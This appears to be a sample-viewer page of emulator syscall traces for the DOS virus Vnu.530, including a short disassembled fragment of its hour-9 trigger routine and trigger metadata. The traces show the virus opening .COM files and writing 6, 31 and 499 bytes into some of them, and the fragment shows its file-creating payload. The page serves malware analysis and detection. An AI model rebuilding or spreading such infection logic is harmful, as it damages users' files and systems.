Sample viewer

vx.netlux.org/Virus.DOS.Vnu.530

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:26.771906026Z 78 PC: 12b2a | Find first file
2018-12-17T23:10:26.776389207Z 61 PC: 12b4c | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:26.780324535Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.784340477Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.785872023Z 66 PC: 12b9b | Move file pointer
2018-12-17T23:10:26.786900435Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-17T23:10:26.789123023Z 66 PC: 12baf | Move file pointer
2018-12-17T23:10:26.791044517Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:10:26.793020527Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-17T23:10:26.803725812Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.809521615Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.816443099Z 61 PC: 12b4c | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:26.821298401Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.82689177Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.830729625Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.832231684Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.83549513Z 61 PC: 12b4c | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:26.84010446Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.846939276Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.848946069Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.852576287Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.855596665Z 61 PC: 12b4c | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:26.862362536Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.870008447Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.871680777Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.87346215Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.879102645Z 61 PC: 12b4c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:26.8858251Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.892572486Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.895057875Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.896962304Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.8996907Z 61 PC: 12b4c | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:26.907444962Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.913678221Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.915018372Z 66 PC: 12b9b | Move file pointer
2018-12-17T23:10:26.916527467Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-17T23:10:26.920121717Z 66 PC: 12baf | Move file pointer
2018-12-17T23:10:26.921700295Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:10:26.92974153Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-17T23:10:26.939006383Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.947082962Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.94988518Z 61 PC: 12b4c | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:26.956997329Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.963497697Z 66 PC: 12b7b | Move file pointer
2018-12-17T23:10:26.964750839Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.96781124Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.970490046Z 61 PC: 12b4c | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:26.976837522Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-17T23:10:26.979829095Z 62 PC: 12be3 | Close file
2018-12-17T23:10:26.981684568Z 79 PC: 12b2a | Find next file
2018-12-17T23:10:26.984073613Z 44 PC: 12bf7 | Get time 0x12bf7: cmp ch, 9
0x12bfa: je 0x12c01
0x12bfc: mov ax, 0x100
0x12bff: jmp ax
0x12c01: mov ah, 0x3c
0x12c03: mov cx, 0x20
0x12c06: lea dx, word ptr [bp + 0x2f9]
0x12c0a: int 0x21
0x12c0c: jb 0x12c10
0x12c0e: jmp 0x12c1a
0x12c10: mov al, byte ptr [0x2f9]
0x12c13: inc al
0x12c15: mov byte ptr [0x2f9], al
0x12c18: jmp 0x12c01
0x12c1a: xchg ax, bx
0x12c1b: mov ah, 0x40
0x12c1d: lea dx, word ptr [bp + 0x19b]
0x12c21: mov cx, 0x2d
0x12c24: int 0x21
0x12c26: mov ah, 0x3d

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16857,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:06.481920029Z 78 PC: 12b2a | Find first file
2018-12-25T12:54:06.48841647Z 61 PC: 12b4c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:06.494689537Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-25T12:54:06.501036292Z 66 PC: 12b7b | Move file pointer
2018-12-25T12:54:06.502493443Z 66 PC: 12b9b | Move file pointer
2018-12-25T12:54:06.503658529Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:54:06.506091733Z 66 PC: 12baf | Move file pointer
2018-12-25T12:54:06.507617405Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-25T12:54:06.510392439Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-25T12:54:06.523936525Z 62 PC: 12be3 | Close file
2018-12-25T12:54:06.532042177Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.53450021Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.540762365Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.547802766Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.54925861Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.550846853Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.553887043Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.5604027Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.56745463Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.569055869Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.570779922Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.573365774Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.579899496Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.586331565Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.587962645Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.589955454Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.593737527Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.599998257Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.606034117Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.607781228Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.609314129Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.611777868Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.619299544Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.625404395Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.626897109Z 66 PC: 12b9b | Move file pointer (See above)
2018-12-25T12:54:06.63121352Z 64 PC: 12ba6 | Write file or device (See above)
2018-12-25T12:54:06.634084605Z 66 PC: 12baf | Move file pointer (See above)
2018-12-25T12:54:06.635803819Z 64 PC: 12bba | Write file or device (See above)
2018-12-25T12:54:06.644594844Z 64 PC: 12bdf | Write file or device (See above)
2018-12-25T12:54:06.652419397Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.660126842Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.663234813Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.669547867Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.675672428Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.677371144Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.67943591Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.683178456Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.68952566Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.692535231Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.694184844Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.696654805Z 44 PC: 12bf7 | Get time 0x12bf7: cmp ch, 9
0x12bfa: je 0x12c01
0x12bfc: mov ax, 0x100
0x12bff: jmp ax
0x12c01: mov ah, 0x3c
0x12c03: mov cx, 0x20
0x12c06: lea dx, word ptr [bp + 0x2f9]
0x12c0a: int 0x21
0x12c0c: jb 0x12c10
0x12c0e: jmp 0x12c1a
0x12c10: mov al, byte ptr [0x2f9]
0x12c13: inc al
0x12c15: mov byte ptr [0x2f9], al
0x12c18: jmp 0x12c01
0x12c1a: xchg ax, bx
0x12c1b: mov ah, 0x40
0x12c1d: lea dx, word ptr [bp + 0x19b]
0x12c21: mov cx, 0x2d
0x12c24: int 0x21
0x12c26: mov ah, 0x3d

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":9,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16857,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:06.806130381Z 78 PC: 12b2a | Find first file
2018-12-25T12:54:06.814548899Z 61 PC: 12b4c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:06.82242648Z 63 PC: 12b63 | Read file or device (Read 6 bytes on handle 5)
2018-12-25T12:54:06.82991761Z 66 PC: 12b7b | Move file pointer
2018-12-25T12:54:06.832904166Z 66 PC: 12b9b | Move file pointer
2018-12-25T12:54:06.83501052Z 64 PC: 12ba6 | Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:54:06.838290706Z 66 PC: 12baf | Move file pointer
2018-12-25T12:54:06.840208389Z 64 PC: 12bba | Write file or device (Write 31 bytes on handle 5)
2018-12-25T12:54:06.844971351Z 64 PC: 12bdf | Write file or device (Write 499 bytes on handle 5)
2018-12-25T12:54:06.860300248Z 62 PC: 12be3 | Close file
2018-12-25T12:54:06.869524579Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.873542224Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.88083663Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.888257048Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.89085321Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.892855634Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.895822386Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.903915805Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.911182685Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.912977112Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.915416297Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.919398064Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.927526762Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.935222844Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.938273182Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.94044034Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.943592789Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.952703477Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.960076364Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.96203905Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:06.964841144Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:06.967874011Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:06.975464418Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:06.983241426Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:06.984880143Z 66 PC: 12b9b | Move file pointer (See above)
2018-12-25T12:54:06.986247245Z 64 PC: 12ba6 | Write file or device (See above)
2018-12-25T12:54:06.990009406Z 66 PC: 12baf | Move file pointer (See above)
2018-12-25T12:54:06.991993962Z 64 PC: 12bba | Write file or device (See above)
2018-12-25T12:54:07.002175217Z 64 PC: 12bdf | Write file or device (See above)
2018-12-25T12:54:07.01088891Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:07.020346267Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:07.023043508Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:07.030054165Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:07.0378453Z 66 PC: 12b7b | Move file pointer (See above)
2018-12-25T12:54:07.039461563Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:07.041290127Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:07.044581857Z 61 PC: 12b4c | Open file (See above)
2018-12-25T12:54:07.051798617Z 63 PC: 12b63 | Read file or device (See above)
2018-12-25T12:54:07.055391551Z 62 PC: 12be3 | Close file (See above)
2018-12-25T12:54:07.058181894Z 79 PC: 12b2a | Find next file (See above)
2018-12-25T12:54:07.060945663Z 44 PC: 12bf7 | Get time 0x12bf7: cmp ch, 9
0x12bfa: je 0x12c01
0x12bfc: mov ax, 0x100
0x12bff: jmp ax
0x12c01: mov ah, 0x3c
0x12c03: mov cx, 0x20
0x12c06: lea dx, word ptr [bp + 0x2f9]
0x12c0a: int 0x21
0x12c0c: jb 0x12c10
0x12c0e: jmp 0x12c1a
0x12c10: mov al, byte ptr [0x2f9]
0x12c13: inc al
0x12c15: mov byte ptr [0x2f9], al
0x12c18: jmp 0x12c01
0x12c1a: xchg ax, bx
0x12c1b: mov ah, 0x40
0x12c1d: lea dx, word ptr [bp + 0x19b]
0x12c21: mov cx, 0x2d
0x12c24: int 0x21
0x12c26: mov ah, 0x3d
2018-12-25T12:54:07.063242778Z 60 PC: 12c0c | Create or truncate file
2018-12-25T12:54:07.407088065Z 64 PC: 12c26 | Write file or device (Write 45 bytes on handle 5)
2018-12-25T12:54:07.416311394Z 61 PC: 12c2a | Open file (Filename = 'Dedicated to the memory of Kurt Donald Cobain��')